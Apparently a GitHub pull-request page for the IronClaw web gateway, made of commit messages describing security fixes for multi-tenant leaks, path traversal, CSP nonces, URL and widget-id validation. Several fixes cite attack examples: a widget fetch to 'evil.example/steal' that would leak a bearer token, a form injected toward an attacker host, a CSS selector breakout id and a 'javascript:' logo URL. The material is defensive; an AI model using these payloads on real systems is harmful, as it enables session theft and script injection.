exercised the *widget* path of the same selectors — neither would have
caught a built-in-tab regression or a wrong DOM id.

New scenario:
`test_layout_hidden_built_in_tab_and_image_upload_disabled`

* Writes a `.system/gateway/layout.json` with `tabs.hidden:
  ["routines"]` (a built-in, on purpose — the previous bug was that
  only widget tabs could be hidden, so the built-in is exactly what
  the selector regression broke) and `chat.image_upload: false`.
* Drives the write directly via `/api/memory/write` rather than chat.
  The customization path is independent of the agent loop, and
  side-stepping the mock LLM keeps the test fast and decoupled from
  the canned-response set.
* Reloads the gateway in a fresh browser context so `assemble_index`
  re-runs and `window.__IRONCLAW_LAYOUT__` carries the new flags.
* Asserts via `getComputedStyle` (not the inline `style` attribute,
  so the assertion survives a future refactor that swaps
  `style.display = 'none'` for a class toggle):
  - The `routines` built-in tab has `display: none`.
  - `chat`, `memory`, and `settings` built-in tabs are still visible
    (catches accidental over-matching by a future selector change).
  - `#attach-btn` has `display: none`.
  - `#image-file-input.disabled === true`. Asserting BOTH the visible
    button hide AND the underlying input disable is the contract — a
    widget that calls
    `document.getElementById('image-file-input').click()` must NOT be
    able to bypass the operator's intent.
* Each "tab disappeared from the DOM entirely" / "input doesn't exist"
  case has a distinct error message so a future `index.html`
  restructure produces an actionable failure rather than a confusing
  null-deref.

Also added `.system/gateway/layout.json` to `_CUSTOM_PATHS` so
`_wipe_customizations` clears it between tests in the shared
session-scoped server fixture.

Could not run the test locally — the e2e suite requires a libsql
ironclaw binary build (~10 min) plus a Python venv with Playwright,
neither of which is set up in this environment. Test is written
against the same `_open_authed_page` / `_CUSTOM_PATHS` /
`memory/write` patterns the rest of the file uses, and the DOM ids
were grepped out of `crates/ironclaw_gateway/static/index.html`
directly (`#attach-btn`, `#image-file-input`,
`<button data-tab="routines">`). First real exercise will be in CI.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): refuse customized index in multi-tenant mode (PR #1725 blocker)

Cross-tenant cache leak — `frontend_html_cache` is a single
`Arc<RwLock<Option<FrontendHtmlCache>>>` per `GatewayState` with no
user dimension, and `build_frontend_html` reads `state.workspace`
directly. In multi-tenant deployments
(`resolve_workspace(&state, &user)` driven by `workspace_pool`) this
is unsafe in two compounding ways:

1. **Latent**: even without the cache, `build_frontend_html` reading
   `state.workspace` ignores the per-user pool entirely. If the
   single-user fallback workspace is also populated, every user sees
   that one global workspace's `layout.json` / widgets — one
   operator's branding, hidden tabs, and registered widgets leak to
   every other tenant on the same gateway.

2. **Cache pin**: even if (1) were fixed, the cache key is just
   `(.system/gateway/layout.json mtime, .system/gateway/widgets/
   mtime)` against the global workspace — there is no `user_id` in
   the key. Once the slot is populated, every subsequent `GET /` hits
   the same HTML.

Root cause: the customization assembly path is fundamentally
single-tenant. `index_handler` (`GET /`) is the unauthenticated
bootstrap route — no user identity is available at request time, so
there is no way to resolve the *correct* per-user workspace inside
`build_frontend_html`. The reviewer flagged this as a cache bug; it's
actually an architectural mismatch that the cache makes visible.

**Fix:** in multi-tenant mode (`workspace_pool` set),
`build_frontend_html` short-circuits with `return None` BEFORE
reading `state.workspace` and BEFORE the cache write at the bottom of
the function. The embedded default `INDEX_HTML` is then served to
every user, the static CSP layer applies unchanged (no inline
scripts, no nonce needed), and the cache slot stays empty so it
cannot pin any leaked HTML.

This is the minimal fix that makes the gateway safe to ship in
multi-tenant mode. Per-user customization in multi-tenant deployments
will land in a follow-up PR via a JS-side `fetch('/api/frontend/layout')`
after auth — that endpoint already exists and already routes through
`resolve_workspace(&state, &user)`, so it returns the right workspace.
The layout-config IIFE in `crates/ironclaw_gateway/static/app.js`
already reads `window.__IRONCLAW_LAYOUT__`, which a future change can
populate from that fetch instead of from server-side HTML injection.

Documented the constraint in the doc comment on `build_frontend_html`
so future contributors understand WHY the early return is there
(hands-tied at the unauthenticated route, not laziness) and what the
correct path forward looks like.

Regression test:
`test_build_frontend_html_returns_none_in_multi_tenant_mode` (gated
on `feature = "libsql"` for the workspace backend). The test seeds a
*global* workspace with a hostile-looking layout
(`{"branding":{"title":"TENANT-LEAK-BAIT"}}`) AND a `WorkspacePool`,
attaches both to the GatewayState via `Arc::get_mut`, and asserts:

  1. `build_frontend_html` returns `None` — if it ever reads
     `state.workspace` again in multi-tenant mode, the bait title
     would land in the assembled HTML and this test would fail loudly
     with an actionable diagnostic.
  2. `state.frontend_html_cache` slot is still `None` after the call
     — the early return must short-circuit BEFORE the cache write at
     the bottom of the function, otherwise a poisoned entry would
     serve the leaked HTML to subsequent requests even after the bug
     is fixed.

Both contracts are independent — a future regression that breaks one
without the other is still caught.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 335 passed (was 334; +1 for the new multi-tenant guard test)
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 Copilot review (6 findings)

Six new inline findings from the latest Copilot review pass on
PR #1725. All verified against the source — no false positives this
round. Grouped by file:

**1+2. Widget directory names not validated against `is_safe_segment`**
(`src/channels/web/handlers/frontend.rs`). Both `load_widget_manifests`
and `load_resolved_widgets` fed `entry.name()` straight into
`read_widget_manifest`, which composed `{WIDGETS_DIR}{name}/manifest.json`
and friends without checking the segment. Any filesystem-backed
`Workspace` implementation that doesn't normalize `.`/`..`/backslash/NUL
components would have allowed a widget directory called `..` (or with
embedded separators) to escape the `.system/gateway/widgets/` subtree.

The natural chokepoint is `read_widget_manifest` itself — both call
sites already route through it for the `manifest.id == directory_name`
check, so adding a single `is_safe_segment(directory_name)` guard at
the top of that function fixes both call paths at once. Same validator
the public `/api/frontend/widget/{id}/{*file}` endpoint already
enforces, so widget *discovery* is now in line with widget *serving*.

Regression test `skips_widget_with_unsafe_directory_name` covers `..`,
`.`, embedded `/`, embedded `\`, and embedded NUL — five distinct
rejection vectors. Probes `read_widget_manifest` directly so it
covers both call sites with one tokio test.

**3. `layout_has_customizations` over-triggers on empty branding colors**
(`src/channels/web/server.rs`). Treating `branding.colors.is_some()`
as a customization forced the per-response nonce CSP path even when
both `primary` and `accent` were `None` or whitespace-only (which
the `is_safe_css_color` validator strips at injection time). Replaced
with a `has_branding_colors` check that requires at least one
trimmed-non-empty color field, mirroring what `BrandingConfig::to_css_vars`
actually emits. No security impact, just removes a pointless slow
path that produced zero effective branding output.

**4. FRONTEND.md "eval-equivalent constructs" claim was factually wrong**
(`src/workspace/seeds/FRONTEND.md:71`). The Security model section
told operators that widgets can use "`eval`-equivalent constructs that
don't trip the CSP". The gateway CSP does NOT include `'unsafe-eval'`,
so `eval()`, `new Function()`, and string-form `setTimeout` /
`setInterval` are all blocked by the browser. Rewrote the sentence to
describe what widgets *actually* have access to: `IronClaw.api.fetch`
against same-origin endpoints, full DOM mutation, event listeners on
the chat input, and dynamic `import()` from any origin allowed by the
gateway's `script-src` (`'self'`, jsDelivr, cdnjs, esm.sh). The CSP
narrows the *shape* of attacks a widget can mount, not the blast
radius — the real trust boundary is still `memory_write` access to
the workspace.

**5. Bare-string `replace(NONCE_PLACEHOLDER, ...)` could mutate widget bodies**
(`src/channels/web/server.rs`). `index_handler` previously did
`html.replace(NONCE_PLACEHOLDER, &nonce)` to swap the per-response
nonce into the assembled HTML. A widget author who wrote the literal
string `__IRONCLAW_CSP_NONCE__` in their own JS — in a comment, log
line, test fixture, or string constant — would have had their source
silently mutated into a per-request nonce, breaking the widget in a
way that's nearly impossible to debug.

Extracted `stamp_nonce_into_html(html, nonce)` helper that targets
the full attribute form `nonce="__IRONCLAW_CSP_NONCE__"` instead of
the bare placeholder. The double-quoted sentinel is unambiguous in
HTML context — it can never accidentally match free text in a JS
module body, a comment, or a JSON payload. Two regression tests:

  - `test_stamp_nonce_into_html_replaces_attribute` — vanilla
    happy path, attribute on a `<script>` tag is rewritten.
  - `test_stamp_nonce_into_html_does_not_mutate_widget_body` —
    builds a fragment with TWO sentinels: one in the legitimate
    attribute (must be replaced) and one in the script body as a
    `const SENTINEL = "..."` constant (must NOT be replaced).
    Asserts the attribute was rewritten, the body sentinel
    survived intact, and exactly one occurrence of the placeholder
    remains in the result. A future regression to a bare-string
    replace would drop the body occurrence count to 0 and fail
    loudly with the diff.

**6. `mock_llm._normalize_tool_calls` would crash on non-dict list elements**
(`tests/e2e/mock_llm.py`). The function called `item.get(...)` on
every list element with no shape check. A future `TOOL_CALL_PATTERNS`
entry that accidentally returned a list of tuples / strings / `None`
would crash mid-request with an opaque
`AttributeError: 'tuple' object has no attribute 'get'` deep inside
aiohttp's request handler, taking the whole mock server down for
every test in the same `pytest` invocation.

Added `isinstance` guards on both the list element AND its
`arguments` field, plus a similar guard on the single-call branch.
Each raises a clear `TypeError` naming the offending tool, the list
index, and the unexpected type — so a malformed pattern fails at the
exact line of the offense rather than as collateral damage three
frames deep in aiohttp.

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests` zero
  warnings
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 338 passed (was 335; +3 for the new tests:
  `test_stamp_nonce_into_html_replaces_attribute`,
  `test_stamp_nonce_into_html_does_not_mutate_widget_body`,
  `skips_widget_with_unsafe_directory_name`)
- `cargo test -p ironclaw_gateway` — 52 unit + 1 doctest passed
- `python3 -m py_compile tests/e2e/mock_llm.py` clean

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 serrrfirat round 2 (multi-tenant CSS + URL validation)

Two new findings from the latest serrrfirat review pass on PR #1725.
A third finding (NONCE_PLACEHOLDER global replace mutating widget
bodies) was already resolved in 56c43f56 — `stamp_nonce_into_html` is
attribute-targeted with regression tests `test_stamp_nonce_into_html_
replaces_attribute` and `test_stamp_nonce_into_html_does_not_mutate_
widget_body` already locking the contract.

**1. Medium — `css_handler` missing multi-tenant guard**
(`src/channels/web/server.rs`). When I fixed `build_frontend_html`
in b9da40e7 to refuse the customization assembly path under
`workspace_pool.is_some()`, I missed the sibling `css_handler` —
which still read `state.workspace` unconditionally to layer
`.system/gateway/custom.css` onto `/style.css`. Same shape as the
index leak: in multi-tenant mode the CSS handler would serve one
operator's custom.css to every other tenant via the
unauthenticated `/style.css` bootstrap route. Now mirrors the
sibling guard:

  let css = if state.workspace_pool.is_some() {
      Cow::Borrowed(assets::STYLE_CSS)  // refuse overlay path
  } else {
      // ... existing single-tenant overlay path
  };

The early return bypasses the workspace read entirely, so the
hot path stays allocation-free (`Cow::Borrowed`). Per-user CSS
overrides can ride a future authenticated `/api/frontend/custom-css`
endpoint that routes through `resolve_workspace(&state, &user)`,
mirroring the same follow-up plan for `/api/frontend/layout`.

Regression test `test_css_handler_returns_base_in_multi_tenant_mode`
(libsql-gated): seeds a global workspace with hostile-looking
custom.css containing the literal string `TENANT-LEAK-BAIT`,
attaches both the workspace AND a `WorkspacePool` to the
GatewayState via `Arc::get_mut`, hits `/style.css` via
`tower::ServiceExt::oneshot`, and asserts:

  1. The bait marker is absent from the response body (catches a
     future regression that re-reads `state.workspace` in
     multi-tenant mode — the leaked content would land in the
     diagnostic).
  2. The response body equals `assets::STYLE_CSS` byte-for-byte
     (catches a subtler regression where the leak content is
     dropped but the multi-tenant path still does the owned
     `format!`, breaking the borrowed hot-path optimization).

Both contracts are independent — a future regression breaking
either alone is still caught.

**2. Medium — `logo_url` / `favicon_url` not validated**
(`crates/ironclaw_gateway/src/layout.rs`). `BrandingConfig` had
defense-in-depth for color values via `is_safe_css_color`, but
URL fields accepted arbitrary strings. There's no current consumer
in the `app.js` IIFE (the layout-config block doesn't read them
yet), so no current vulnerability — but they're exposed via
`GET /api/frontend/layout` and the `window.__IRONCLAW_LAYOUT__`
JSON island, so the first consumer that renders them as
`<img src="…">` or `<link rel="icon" href="…">` would inherit a
latent footgun: `javascript:` URI XSS, `data:` URI payload stash,
tracking-pixel exfiltration via attacker-controlled domains.

Added `is_safe_url(value: &str) -> bool` validator (`pub(crate)`,
mirroring `is_safe_css_color`) that accepts:
  - HTTPS / HTTP absolute URLs (HTTP allowed for intranet/dev
    usability — gateway enforces TLS at the network layer)
  - Site-relative paths (`/static/logo.png`) — must start with a
    single `/`, NOT `//` (protocol-relative URLs are
    scheme-flippable in the browser URL parser and historically a
    CSP-bypass source)

And rejects:
  - `javascript:`, `data:`, `vbscript:`, `file:`, `blob:`, any
    other non-HTTP(S) scheme
  - HTML attribute breakout vectors (`<`, `>`, `"`, `'`, backtick,
    backslash)
  - Control chars (NUL, newline, CR, tab) for copy-paste
    smuggling defense
  - Empty / whitespace-only / > 2048 bytes (matches the de-facto
    Chrome / Apache URL length cap)

Added `BrandingConfig::safe_logo_url(&self) -> Option<&str>` and
`safe_favicon_url(&self) -> Option<&str>` getters that return
`None` when the underlying field fails validation. This is the
contract any future consumer must use — routing through the
getter keeps validation at the type layer so a future caller
can't accidentally bypass it by reading the raw `Option<String>`
field.

Updated `layout_has_customizations` in server.rs to call the new
getters instead of `b.logo_url.is_some()` / `b.favicon_url.is_some()`,
mirroring the precedent set for branding colors: a `layout.json`
that only sets `logo_url: "javascript:alert(1)"` (and nothing
else) no longer triggers the customized HTML path because the
value gets dropped at the validator. Symmetric with how empty
branding colors are gated.

Tests in `layout::tests`:
  - `test_is_safe_url_accepts_common_forms` — HTTPS, HTTP,
    site-relative, leading/trailing whitespace
  - `test_is_safe_url_rejects_injection_vectors` — full classifier
    sweep: `javascript:` (case-insensitive), `data:`, `vbscript:`,
    `file:`, `blob:`, protocol-relative `//`, every HTML breakout
    char, every control char, empty, whitespace-only, length cap
    (asserts both the 2049-char rejection AND the 2048-char limit
    boundary), no-scheme bare hostname, single `/` root path
  - `test_branding_safe_logo_url_filters_invalid` — round-trip
    contract: safe values pass through, hostile values return None,
    absent values return None
  - `test_branding_safe_favicon_url_filters_invalid` — same
    contract for the parallel field so a future consumer can never
    accidentally route favicon through a bypass while logo is
    correctly validated

Quality gate:
- `cargo fmt` clean
- `cargo clippy --no-default-features --features libsql --tests`
  zero warnings
- `cargo test -p ironclaw_gateway` — 56 unit + 1 doctest passed
  (was 52; +4 for the URL validator tests)
- `cargo test --no-default-features --features libsql --lib channels::web`
  — 339 passed (was 338; +1 for the css_handler multi-tenant
  guard test)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(gateway): address PR #1725 paranoid review round 3 (7 findings)

Seven items from serrrfirat's third paranoid-architect pass on
PR #1725. Two HIGH (token exfil + chat-renderer DOM bypass), three
MEDIUM (widget id CSS injection + admin role on layout write + URL
field visibility), one LOW (workspace path leak in 404), and one test
coverage gap (CSP nonce e2e). Five "verified fixed" items from the
audit need no code change — replied separately on the audit thread.

**P-JS2 (HIGH) — IronClaw.api.fetch same-origin guard**
(`crates/ironclaw_gateway/static/app.js`). The widget API's `fetch`
method injected the session `Authorization: Bearer <token>` into
*any* URL, including absolute cross-origin URLs. A widget calling
`IronClaw.api.fetch('https://evil.example/steal')` would have
exfiltrated the user's session token. Now resolves `path` against
`window.location.origin` and rejects with a `TypeError` if the
resulting origin differs from the gateway's. Same-origin and
relative paths still work; site-relative `/api/foo`, `https://<this-host>/api/foo`,
and other intra-origin shapes pass through unchanged. The error
message names both the requested origin and the expected origin so
the widget author sees the misuse at the offending call site.

**P-JS1 (HIGH) — sanitize after registerChatRenderer callback**
(`crates/ironclaw_gateway/static/app.js`). `renderMarkdown` runs
`sanitizeRenderedHtml` (DOMPurify) on its output BEFORE
`upgradeStructuredData` invokes registered chat renderers. A
renderer's `render(contentEl, ...)` callback receives the live
`.message-content` DOM element and can call
`contentEl.innerHTML = '<form action="https://attacker">...'`,
bypassing the sanitization step entirely. CSP blocks `<script>`
execution either way, but form / iframe / object / clickjack-overlay
injection still works. Now re-runs `sanitizeRenderedHtml` on
`contentEl.innerHTML` after the renderer returns. DOMPurify is
idempotent on already-safe HTML so the cost on the happy path is
bounded by the sanitizer's walk of the post-renderer subtree.

**P-W4 + P-H10 (MEDIUM) — widget id charset validation**
(`crates/ironclaw_gateway/src/layout.rs`,
`src/channels/web/handlers/frontend.rs`). `scope_css` raw-interpolates
the widget id into `[data-widget="<id>"]` with no escape pass; a
manifest id like `x"],.evil{color:red}[x` would close the attribute
selector and inject arbitrary CSS rules. The HTML attribute side is
already protected by `escape_html_attr`, but defense-in-depth at the
type level closes both vectors and protects every future call site
that interpolates the id without thinking about it.

Added `is_safe_widget_id(s) -> bool` (`pub` in `layout.rs`,
re-exported from `lib.rs`): `^[a-zA-Z0-9][a-zA-Z0-9._-]*$`, ≤64
chars. The first-char-must-be-alphanumeric rule means an id can't
look like an option flag (`-foo`), a hidden file (`.foo`), or a
separator fragment. Enforced at the chokepoint
`read_widget_manifest` in `handlers/frontend.rs` alongside the
existing `is_safe_segment(directory_name)` check, so a hostile
manifest is rejected at load time before any rendering layer (CSS,
HTML, path composition) sees the id.

The reject-then-mismatch-check ordering matters: a hostile id is
logged as "unsafe charset" rather than as a directory mismatch,
which is the more useful diagnostic. Two new test layers:

  - `is_safe_widget_id_accepts_existing_fixtures` — every widget id
    used in test fixtures and FRONTEND.md examples must remain
    valid. Narrowing the regex after these have shipped would be a
    breaking change, so this test pins the contract.
  - `is_safe_widget_id_rejects_injection_payloads` — full sweep:
    serrrfirat's CSS-selector breakout payload, HTML attribute
    breakouts, path traversal vectors, whitespace, control chars,
    non-ASCII, leading non-alphanumeric, empty, and the 64-char
    boundary (64 passes, 65 fails).
  - `widget_loader::skips_widget_when_manifest_id_fails_charset_check`
    — end-to-end regression: write a manifest with the CSS-selector
    breakout id under a directory name that DOES pass
    `is_safe_segment`, and verify both `read_widget_manifest` and
    `load_resolved_widgets` reject it. Catches a future regression
    that moves the check away from the chokepoint.

**P-H9 (MEDIUM) — AdminUser on layout write endpoint**
(`src/channels/web/handlers/frontend.rs`).
`frontend_layout_update_handler` used `AuthenticatedUser` (any
role), so a `member`-role token holder could rewrite the global
layout in single-tenant mode — changing branding, hiding tabs,
disabling widgets for every user of the gateway. Switched to
`AdminUser`. In multi-tenant mode this still scopes per-user via
`resolve_workspace`, so admins configuring their own tenant get the
expected behavior; member tokens are now denied at the role gate
the same way they're denied for user management and secrets
management. `AdminUser` is a `pub struct AdminUser(pub UserIdentity)`
so the existing `&user` argument to `resolve_workspace` works
without changes — added it to the existing `use ...auth::{...}`
import alongside `AuthenticatedUser`.

**P-L3 (MEDIUM) — sanitize URL fields on serialize + downgrade
visibility** (`crates/ironclaw_gateway/src/layout.rs`).
`safe_logo_url` / `safe_favicon_url` getters existed with proper
`is_safe_url` validation, but the underlying `pub Option<String>`
fields were directly accessible — both for Rust callers (who could
read them by name without going through the validator) and for the
JS side via the `window.__IRONCLAW_LAYOUT__` JSON island, which
serializes the raw struct. A future consumer rendering
`<a href="${layout.branding.logo_url}">` would inherit the
`javascript:` URI XSS that the safe getter is supposed to prevent.

Two-part fix:

  1. Downgraded `logo_url` and `favicon_url` to `pub(crate)`. All
     existing constructors are intra-crate (verified by grep), so
     no public API breakage. External Rust callers must now route
     through the safe getters by construction.
  2. Added `skip_unsafe_url` serde predicate
     (`#[serde(skip_serializing_if = "skip_unsafe_url")]`) that
     drops the field from JSON output when the value is missing,
     empty, or fails `is_safe_url`. Closes the wire-format leg: even
     if a future intra-crate caller bypasses the getters and writes
     a hostile value into the field directly, the JSON shipped to
     the JS side and to `GET /api/frontend/layout` simply omits the
     field entirely. No `null`, no `javascript:` payload, nothing
     for a future consumer to inadvertently render.

The first iteration tried `serialize_with` for the same job, but
that runs *after* `skip_serializing_if` so a hostile value
serialized as `null` instead of being skipped. Predicate-side
filtering is the correct shape — `skip_unsafe_url` returns `true`
on every "drop the field" branch and `false` only when the value is
present-and-safe.

Two new tests pin both the wire format and the happy path:
  - `branding_serialize_drops_hostile_urls` — serializes a config
    with `javascript:` and `data:` URIs and asserts the resulting
    JSON contains neither `logo_url` nor `favicon_url` keys, AND
    that the hostile payload strings don't appear anywhere in the
    output.
  - `branding_serialize_preserves_safe_urls` — round-trip check:
    `https://example.com/logo.png` and `/favicon.ico` survive
    serialization unchanged so legitimate operator branding still
    reaches the JS side.

**P-H1 (LOW) — strip workspace path from widget 404 error**
(`src/channels/web/handlers/frontend.rs`). The handler returned
`format!("Widget file not found: {path}")`, leaking the resolved
`.system/gateway/widgets/{id}/{file}` path back to the caller. That
gives an attacker a free oracle for "what directories exist" inside
the workspace. Now returns the generic message
`"Widget file not found"` and logs the full path internally via
`tracing::warn!` so debugging a 404 still works.

…
zmanian added a commit that referenced this pull request Apr 11, 2026
- Remove overly-broad custom element regex that incorrectly stripped
  non-HTML like <commit-hash>, <pre-condition> (review comment #3)
- Replace allowlist-only approach with two-pass catch-all: preserve
  Rust/Java generics via placeholder substitution, then strip all
  remaining HTML-like tags including unknown/future tags and custom
  elements (review comment #2)
- Fail-closed on regex compilation failure already implemented; this
  commit also covers the catch-all regex path (review comment #1)
- Change tracing::warn! to tracing::debug! in background routine
  engine to avoid corrupting REPL/TUI display (review comment #4)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
serrrfirat added a commit that referenced this pull request Apr 13, 2026
Critical fixes:
- Use DB-first config system for MissionsConfig instead of raw
  std::env::var in router.rs (issue #1)
- SessionSummaryHook now uses thread_ids from HookEvent::SessionEnd
  to summarize the correct conversation instead of guessing via
  recency; falls back to most-recent for backward compatibility (#2)
- Add per-user rate limiter (10/min, 60/hr) and 15s timeout on
  reasoning LLM calls in MemorySearchTool to prevent unbounded
  usage (#3)

Test coverage:
- Caller-level tests for reasoning-augmented recall (LLM wiring,
  disabled config, and failure fallback paths) (#4)
- SessionSummaryHook LLM failure path test confirming fail-open
  behavior (#5)
- reasoning_enabled config field tests (default, env, DB override) (#6)
- MissionSettings and SearchSettings round-trip assertions in
  comprehensive_db_map_round_trip (#11)

Convention fixes:
- Remove double env-var parsing in MissionsConfig::resolve (#7)
- Use ChatMessage::system()/user() constructors in
  SessionSummaryHook (#8)
- Add TODO comments for inline prompt strings (#9)
- Add timeout on reasoning LLM call (#10)

CI fixes:
- Remove 4 stale wasmtime advisory entries from deny.toml
- Add RUSTSEC-2026-0097 (rand 0.8.5) to advisory ignore list

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Apr 14, 2026
…, binary writes

- Add pre-intercept safety param validation so sandbox-dispatched calls
  go through the same checks as host-dispatched calls (#1)
- Set network_mode: "none" on sandbox containers to prevent outbound
  network access (#3)
- Reject binary content in containerized write instead of silently
  corrupting via from_utf8_lossy (#5)
- Cap list_dir depth to 10 to prevent unbounded traversal (#8)
- Change container creation log from info! to debug! to avoid breaking
  REPL/TUI output (#10)
- Make is_truthy case-insensitive so SANDBOX_ENABLED=True works (#11)
- Return error instead of unwrap_or_default for missing container ID (#12)
- Propagate set_permissions errors instead of silently ignoring (#13)
- Return error for missing daemon output key instead of defaulting to
  empty object (#14)
- Add env mutex guard in sandbox_live_e2e test (#15)
- Fix rustfmt formatting for let-chain in canonicalize_under_root

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
ilblackdragon added a commit that referenced this pull request Apr 14, 2026
…1963)

* feat(web): add admin management panel

* fix(web): address admin panel review findings

* fix(web): address remaining admin review feedback

* refactor(web): type admin api responses

* fix(db): aggregate admin usage summary in sql

* Add audit logging for admin privileged state-changes

Add structured tracing (warn-level) to suspend, activate, delete, and
update handlers so that privileged admin actions are recorded with the
acting admin's user_id, the action performed, and the target user.
Addresses security assessment item #1 from PR review.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* Fix PairingStore::new() call in test after staging merge

Use PairingStore::new_noop() since the test doesn't need a real DB.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(admin): address PR #1963 review feedback

- Fix total_jobs semantics: query agent_jobs directly instead of
  counting via LEFT JOIN on llm_calls (which missed jobs without
  LLM calls). Fixed in both libSQL and PostgreSQL backends.
- Fix showConfirmModal XSS: escape message parameter internally
  instead of relying on callers to sanitize.
- Add explicit ::numeric cast to PG COALESCE(SUM(cost), 0) to
  prevent integer type inference.
- Use info! instead of warn! for successful admin audit events
  (update, suspend, activate, delete) — warn implies anomaly.
- Add missing index on llm_calls.created_at for both PG (V21
  migration) and libSQL (incremental migration 21).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* Address remaining admin panel review follow-ups

* fix: address review comments — query consolidation, CSP, docs, security notes

- Collapse 4 redundant llm_calls subqueries into single subquery (libsql + pg)
- Add WARNING to V21 migration about table lock risk with CONCURRENTLY note
- Add performance doc comments on admin_usage_summary full-table scan
- Add CSP and noindex meta tags to admin.html
- Add JSDoc for showConfirmModal documenting auto-escaping
- Add sessionStorage threat model security comment
- Add serde(flatten) collision risk doc on AdminUserDetailResponse
- Add TODO(#1968) for inline styles migration to CSS custom properties
- Add PG parity test stub for admin_usage_summary

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: renumber migration from V21/23 to V24 to avoid conflicts with staging

Staging added V21 (backfill_conversation_source_channel), V22
(sandbox_restart_params), and V23 (list_workspace_files_escape_like).
Renumber our llm_calls_created_at_index migration to V24 in both PG
and libSQL.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address review feedback — CSP, logging, validation, dispatch-exempt, tests

- Remove 'unsafe-inline' from script-src CSP; move CSP to HTTP response header
- Change audit tracing::info! to tracing::debug! (TUI corruption)
- Add dispatch-exempt annotation on usage_summary_handler
- Add server-side input validation on users_create_handler (name length, email, role)
- Rename detailRowHtml to detailRowRawHtml with XSS safety comment
- Add real PG integration test for admin_usage_summary with non-zero data

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(ci): skip test-only directories in no-panics check

Files under `src/**/tests/*.rs` are Rust test sub-modules included
behind `#[cfg(test)]` — they are never compiled in production builds.
The no-panics checker was flagging `.unwrap()` and `assert!()` in
helper functions at module level in these files as production code.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(admin): scope cost aggregates to 30d, drop external fonts, flatten detail response

Addresses review feedback on #1963:

- Scope all llm_calls aggregates to the 30d `since` window so the admin
  dashboard query is served by `idx_llm_calls_created_at` rather than a
  full table scan. Drops the unused all-time `total_cost` subquery from
  both libsql and postgres backends.
- Self-contain the admin SPA — remove `fonts.googleapis.com` /
  `fonts.gstatic.com` link tags from admin.html and tighten the admin
  CSP to fully same-origin. Typography degrades to the system-font
  fallback already listed in `font-family`.
- Fold `metadata` into `AdminUserInfo` (optional, skip-if-none) and
  remove the `#[serde(flatten)]` wrapper, eliminating the
  documented collision risk.
- Add regression test asserting `since` actually bounds the LLM
  aggregates (future `since` should yield zero LLM counts without
  affecting non-windowed counts).

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: ilblackdragon@gmail.com <ilblackdragon@gmail.com>
henrypark133 added a commit that referenced this pull request Apr 15, 2026
…rs, tighten tests

- propagate_approval: propagate on_start() error as ActivationFailed
  instead of swallowing it (zmanian review #1)
- router.rs: move test-only HashMap import into mod tests (zmanian #2)
- chat.rs: remove duplicate clear_auth_mode (Copilot review #1)
- e2e: strengthen auth-token assertion to check status 200 + success
  field, remove overlapping test_auth_cancel_returns_success (Copilot #2/#3)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
serrrfirat added a commit that referenced this pull request Apr 15, 2026
…ove backup/restore (#2389)

- Remove `DatabaseConfigBackup` struct and backup/restore methods;
  reorder quick-mode flow so profile selection runs before
  `auto_setup_database()`, letting the existing clone→try_load→merge_from
  pattern preserve wizard-chosen DB settings naturally (henrypark133).
- Add comment explaining the cfg-gated `loaded` variable shadowing in
  `try_load_existing_settings` (zmanian #1).
- Change catch-all `_ =>` to explicit `1 => ... _ => unreachable!()`
  in profile match arm (zmanian #3).
- Add caller-level test verifying profile application preserves DB config
  through the merge_from cycle (henrypark133 testing feedback).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
@claude claude bot mentioned this pull request Apr 17, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants